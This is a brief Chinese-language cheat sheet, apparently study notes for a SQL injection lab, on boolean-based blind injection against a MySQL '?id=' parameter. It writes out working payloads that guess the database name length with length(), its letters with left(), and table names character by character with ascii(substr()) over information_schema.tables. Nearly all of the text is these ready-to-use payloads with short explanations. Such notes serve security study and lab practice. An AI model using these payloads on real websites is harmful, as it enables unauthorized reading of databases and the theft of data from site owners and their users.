?id=1’ and length(database())=n %23 n从0到无穷大 猜出数据库长度
?id=1’ and left(database(),1)>’a‘–+ 猜数据库首字母 显示you are in 表示该字母还在输入的字母后假设输入一个显示you are in的下一个什么都没显示 则为此 第二第三位一次猜下去(猜库名)
- 利用substr() ascii()函数进行尝试
?id=1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100–+ 加黑数字更改 此为ascii码对照数字对应字母 也是和猜库名一样的操作 这猜第一个库的第一个字符 然后一个一个改 猜出第n个库的第n个字符